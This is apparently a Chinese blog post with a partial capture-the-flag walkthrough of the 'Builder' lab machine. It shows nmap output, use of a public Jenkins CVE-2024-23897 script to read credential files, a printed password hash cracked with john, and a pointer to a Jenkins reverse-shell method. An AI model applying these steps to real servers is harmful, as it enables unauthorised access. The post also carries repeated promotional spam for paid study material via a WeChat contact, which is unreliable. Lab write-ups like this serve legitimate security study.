HTB-Builder(1)，网络安全面试刷题

最新推荐文章于 2024-08-22 21:34:06 发布

2301_76223496

最新推荐文章于 2024-08-22 21:34:06 发布

阅读量709

点赞数 16

分类专栏： 2024年程序员学习文章标签： web安全面试网络

本文链接：https://blog.csdn.net/2301_76223496/article/details/137763216

版权

2024年程序员学习专栏收录该内容

298 篇文章 0 订阅

订阅专栏

先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7

深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

如果你需要这些资料，可以添加V获取：vip204888 （备注网络安全）

正文

信息收集

TCP开放端口扫描

Nmap scan report for 10.10.11.10

Host is up (8.0s latency).

Not shown: 61658 filtered tcp ports (no-response), 3875 closed tcp ports (reset)

PORT STATE SERVICE

22/tcp open ssh

8080/tcp open http-proxy

探测tcp开放端口服务信息

Nmap 7.93 scan initiated Fri Mar 15 13:30:22 2024 as: nmap -v -sC -sT -sV -O -p22,8080, -oA open_port_service -oA open_port_service 10.10.11.10

Nmap scan report for 10.10.11.10

Host is up (0.41s latency).

PORT     STATE SERVICE VERSION

22/tcp   open ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|_ 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)

8080/tcp open http    Jetty 10.0.18

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

| http-robots.txt: 1 disallowed entry

|_/

|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1

|_http-title: Dashboard [Jenkins]

| http-open-proxy: Potentially OPEN proxy.

|_Methods supported:CONNECTION

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%)

No exact OS matches for host (test conditions non-ideal).

Uptime guess: 13.362 days (since Sat Mar 2 03:51:07 2024)

Network Distance: 2 hops

TCP Sequence Prediction: Difficulty=256 (Good luck!)

IP ID Sequence Generation: All zeros

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/…/share/nmap

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done at Fri Mar 15 13:32:33 2024 – 1 IP address (1 host up) scanned in 130.59 second

Getshell

8080端口

浏览器输入靶机IP后，Jenkins页面，且右下角有明确的版本信息。

浏览器搜索jenkins 2.441 是否存在历史漏洞，发现CVE-2024-23897，然后根据搜索出的文章：

https://github.com/godylockz/CVE-2024-23897

jenkins credentials笔记 | 独奏の小屋

获取py脚本，尝试获取文章中提到的敏感文件，

/var/jenkins_home/users/users.xml

/var/jenkins_home/users/jennifer_12108429903186576833/config.xml

获取到一个密码hash

#jbcrypt:$2a $10$ UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a

取出加密字符串并尝试使用john进行破解：

echo ‘$2a $10$ UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a’ > hash

john hash --wordlist=/usr/share/wordlists/rockyou.txt

得到明文密码princess，尝试登录jenkins，成功！

然后开始搜索jenkins的反弹shell方法：

https://github.com/Brzozova/reverse-shell-via-Jenkins

Go to New Item -> Freestyle job -> Execute Windows batch command.

学习路线：

这个方向初期比较容易入门一些，掌握一些基本技术，拿起各种现成的工具就可以开黑了。不过，要想从脚本小子变成黑客大神，这个方向越往后，需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容：
在这里插入图片描述

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

需要这份系统化的资料的朋友，可以添加V获取：vip204888 （备注网络安全）
[外链图片转存中…(img-nt2hqkoB-1713135453278)]

2301_76223496

关注

16
点赞
踩
17

收藏

觉得还不错? 一键收藏
0
评论
HTB-Builder(1)，网络安全面试刷题

这个方向初期比较容易入门一些，掌握一些基本技术，拿起各种现成的工具就可以开黑了。如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。(img-nt2hqkoB-1713135453278)]浏览器输入靶机IP后，Jenkins页面，且右下角有明确的版本信息。得到明文密码princess，尝试登录jenkins，成功！获取py脚本，尝试获取文章中提到的敏感文件，获取到一个密码hash。
复制链接

扫一扫

专栏目录